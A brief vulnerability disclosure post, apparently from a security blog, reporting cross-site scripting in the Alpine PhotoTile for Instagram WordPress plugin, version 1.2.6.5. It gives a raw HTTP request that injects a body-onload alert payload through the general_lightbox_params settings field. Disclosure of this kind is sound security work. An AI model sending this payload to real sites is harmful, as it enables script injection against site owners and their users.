Wednesday 26 February 2014

[EN] XSS in Alpine PhotoTile for Instagram

# ==============================================================
# Title ...| XSS in Alpine PhotoTile for Instagram
# Version .| Alpine PhotoTile for Instagram 1.2.6.5
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================


# ==============================================================
# XSS

---<request>---
POST /k/wordpress/wp-admin/options-general.php?page=alpine-photo-tile-for-instagram-settings&tab=plugin-settings HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 300

hidden=Y&general_highlight_color=%2364a2d8&general_lightbox=alpine-fancybox&general_lightbox_params='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&general_block_users=&hidden_widget_alignment=1&cache_time=4&alpine-photo-tile-for-instagram-settings_plugin-settings%5Bsubmit-plugin-settings%5D=Save+Settings
---<request>---


# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

No comments:

Post a Comment

What do You think...?